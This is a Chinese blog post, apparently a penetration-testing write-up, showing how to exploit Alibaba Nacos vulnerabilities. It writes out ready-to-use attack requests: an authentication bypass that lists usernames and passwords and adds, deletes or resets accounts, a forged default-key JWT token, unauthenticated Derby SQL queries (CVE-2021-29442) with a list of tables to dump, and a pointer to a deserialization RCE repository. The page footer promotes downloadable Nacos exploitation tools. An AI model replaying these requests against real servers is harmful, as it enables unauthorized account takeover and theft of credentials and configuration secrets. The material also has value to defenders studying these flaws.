Nacos 漏洞利用

已于 2024-07-03 15:40:08 修改
阅读量7k 收藏 22
点赞数 2
分类专栏: 漏洞挖掘 渗透测试 文章标签: 安全 web安全
于 2023-01-03 18:13:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangyongkang666/article/details/128537094
版权

Nacos 漏洞利用

1.漏洞描述:

Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在Nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

影响版本:
Nacos <= 2.0.0-ALPHA.1

在某处漏洞挖掘过程中发现了该漏洞,于是记录一下如何利用该漏洞

2.Nacos权限认证绕过漏洞漏洞利用

1.访问出现以下界面,大概率会出现以下漏洞

在这里插入图片描述

2.1获取已有的用户列表的账号和密码

在路径后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取到已有的用户名和密码,如图

在这里插入图片描述

2.2任意用户添加

更改提交方式为POST , 访问/nacos/v1/auth/users?test111username=test111&password=123456

新建一个账号test111,可以看到创建用户成功,如图

在这里插入图片描述

使用该账号可以发现登录成功,如图
在这里插入图片描述

2.3任意用户删除

更改提交方式为DELETE , 访问DELETE /nacos/v1/auth/users?username=test111

可以看到用户删除成功,如图

在这里插入图片描述

2.4用户密码重置

更改提交方式为PUT,访问 /nacos/v1/auth/users?accessToken=&username=test111&newPassword=test222

可以看到用户密码更新成功,如图

在这里插入图片描述

2.5配置信息泄露

在路径后面加上:nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99

在这里插入图片描述

3.Nacos 未开启服务器鉴权或使用了默认secret.key导致权限绕过漏洞(NVDB-CNVDB-2023674205

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9

在这里插入图片描述

4.Nacos关键功能认证机制缺失导致权限绕过漏洞(CVE-2021-29442)

config server中有个接口,没有做任何的鉴权,即可执行sql语句,可以泄漏全部数据

/nacos/v1/cs/ops/derby?sql=select%20*%20from%20users%20

在这里插入图片描述
查询所有表

/nacos/v1/cs/ops/derby?sql=SELECT%20*%20FROM%20SYS.SYSTABLES%20WHERE%20TABLETYPE='T'

在这里插入图片描述
通过测试,可以用以下的语句查询到所有数据库信息

select * from users
select * from permissions
select * from roles
select * from tenant_info
select * from tenant_capacity
select * from group_capacity
select * from config_tags_relation
select * from app_configdata_relation_pubs
select * from app_configdata_relation_subs
select * from app_list
select * from config_info_aggr
select * from config_info_tag
select * from config_info_beta
select * from his_config_info
select * from config_info

5.Nacos Jraft 反序列化漏洞(CNVD-2023-45001)

该漏洞源于 Nacos 集群处理部分 Jraft 请求时,未限制使用 hessian 进行反序列化,由于 Nacos 默认监听 7848 端口处理 Raft 协议请求,攻击者可以通过向 7848 端口发送恶意构造的数据包利用该漏洞,最终执行任意远程代码

漏洞影响产品

1.4.0 <= Alibaba Nacos < 1.4.6 使用cluster集群模式运行

2.0.0 <= Alibaba Nacos < 2.2.3 任意模式运行

访问/nacos/v1/console/server/state
在这里插入图片描述
查看版本是否受到影响
复现参考https://github.com/c0olw/NacosRce/

makven60
关注
  • 2
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Nacos漏洞综合利用GUI工具(完整源码+说明)(身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
03-27
【资源说明】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传的,请放心下载使用。 2、适用人群:主要针对计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、数学、电子信息等)的同学或企业员工下载使用,具有较高的学习借鉴价值。 3、不仅适合小白学习实战练习,也可作为大作业、课程设计、毕设项目、初期项目立项演示等,欢迎下载,互相学习,共同进步! Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。 Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
Nacos漏洞综合利用工具v6.0
最新发布
Wulai399的博客
05-20 1322
全网最强nacos漏洞综合利用工具
nacos 2.2.3版本
06-29
升级nacos 2.2.3 修复之前版本漏洞
SexyBeast233#SecBooks#Alibaba Nacos 控制台默认弱口令1
07-25
Alibaba Nacos 控制台默认弱口令漏洞描述Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息漏洞影响漏洞
Nacos漏洞总结复现
heike_Ch的博客
04-23 1127
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户
防止nacos 随意添加用户
gjp014的专栏
12-07 4110
nacos 配置
Hvv之Nacos漏洞分析与整改
天道酬勤
08-19 1636
nacos漏洞分析、复现与修复
【技巧分享】Nacos未经授权的登录漏洞-任意密码直接登录后台
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-20 4347
Nacos中发现影响Nacos
修复nacos未授权建账号漏洞
雅冰石的专栏
08-04 3416
发现直接调用如下接口可以增删用户,改用户密码,不安全
Nacos Docker MySQL 8 版本:Nacos:2.2.3,mysql:8.0.30
06-13
修复漏洞Nacos 集群反序列化漏洞 一、漏洞概述 2023 年 6 月 7 日,Nacos 发布新版本,修复了一处远程代码执行漏洞,所 属厂商:alibaba,漏洞编号:暂无,漏洞危害等级:高危。 Nacos 是一个开源的、易于使用的...
nacos越权漏洞复现
u013008898的博客
02-06 848
nacos越权漏洞复现
Nacos未授权访问复现及修复
大数据姐姐
01-22 3249
Nacos未授权访问修复,开启鉴权
Nacos 未授权访问漏洞
热门推荐
ljy啊虎的博客
09-07 2万+
Nacos 未授权访问漏洞 /nacos/v1/auth/users?pageNo=1&pageSize=9
web渗透测试漏洞复现:nacos未授权访问漏洞复现并getshell
HACKONE的博客
03-30 636
nacos未授权访问。
从0认识+识别+掌握nacos漏洞(攻防常见洞)带指纹表和利用工具
milu_Sec的博客
12-31 3567
还是按照之前的文章结构。
Nacos后台系统未授权添加管理员
Websec
12-01 4516
2、使用burpsuite构造好请求包,构造的时候需要填好host和端口即可,然后进行repeater,如果返回包显示{"code":200,"message":null,"data":"create user ok!注明:nacos是配置系统,类似于apollo一样,所以生产环境的话会存在很多明文配置好的账号,一般会有redis、mysql、ssh、web等账号。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。'''测试nacos漏洞'''
NACOS漏洞深入解析(审计+复现)
qq_49849300的博客
03-27 4858
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
nacos漏洞如何触发
06-03
Nacos存在多个漏洞,不同的漏洞触发方式也不同。以下是一些常见的漏洞触发方式: 1. 认证绕过漏洞:攻击者可以通过构造恶意请求,绕过Nacos的身份认证机制,进而获取敏感信息或者执行未授权操作。 2. SQL注入漏洞:攻击者可以通过在请求参数中注入恶意SQL语句,来执行非授权的数据库操作,包括敏感数据泄露、数据库删除等。 3. 信息泄露漏洞:攻击者可以通过发送恶意请求,获取Nacos中存储的敏感信息,如用户名、密码、密钥等。 4. 任意文件读取漏洞:攻击者可以通过构造恶意请求,读取Nacos服务器上的任意文件,包括敏感的配置文件、日志文件等。 5. 任意文件写入漏洞:攻击者可以通过构造恶意请求,将恶意文件写入到Nacos服务器上,进而执行任意代码。 总之,Nacos漏洞的触发方式多种多样,攻击者可以通过各种手段来攻击Nacos服务器。因此,在使用Nacos时,必须要加强安全措施,包括加强密码管理、限制访问权限等,以避免可能的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值